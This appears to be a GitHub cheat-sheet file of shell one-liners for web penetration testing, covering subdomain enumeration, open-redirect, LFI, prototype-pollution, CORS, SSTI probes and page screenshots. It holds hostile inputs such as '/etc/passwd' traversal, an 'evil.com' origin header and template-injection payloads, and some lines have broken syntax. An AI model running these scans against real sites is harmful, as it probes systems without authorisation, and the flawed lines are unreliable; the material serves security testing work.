-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathweb_testing.cheat
47 lines (32 loc) · 2.73 KB
/
web_testing.cheat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
% Web testing, xss/redirect/prototype polution/ screenshots
# subdirectory finder for domains
subfinder -d <target-domain> -o domains_subfinder_$1
# amass enumeration on target domain
amass enum --passive -d <target-domain> -o domains_$1
cat domains_subfinder_$1 | tee -a domain_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt
cat domains_$1.txt | httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt
# Test for Open-Redirect Bug
waybackurls <target-domain> | grep -a -i \=http | bhedak 'http://redirect.com' | while read host do;do curl -s -L $host -I|grep "redirect.com" && echo -e "$host \033[0;31mVulnerable\n" ;done
# Find JS File
assetfinder --subs-only <target-domain> | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done
# Find Subdomains TakeOver
subfinder -d <target-domain> >> domains ; assetfinder --subs-only <target-domain> >> domains ; amass enum -norecursive -noalts -d <target-domain> >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;
# Find LFI
gau <target-domain> | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
# Find Prototype Pollution
subfinder -d <target-domain> -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
# CORS Misconfiguration
site="URL"; gau "$site" | while read url; do target=$(curl -sIH "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found] echo $url; else echo Nothing on "$url"; fi; done
# Dump URLs from sitemap.xml
curl -s <target-domain>/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'
# SSTI to RCE
waybackurls <target-domain> | qsreplace "abc{{9*9}}" > fuzz.txt
ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
# take a screenshot of every page from domain in txt file with aquatone (https://github.com/michenriksen/aquatone/releases)
cat <file> | aquatone -ports 80,443,3000,3001
cat <file> | aquatone -out ./aquatone_screenshots -screenshot-timeout 1000
# take a screenshot of urls from txt file with wkhtmltopdf
cat <file> | while read line; do wkhtmltoimage $line $line.png; done
# hack the box cheat: Misc curl w/ POST
curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'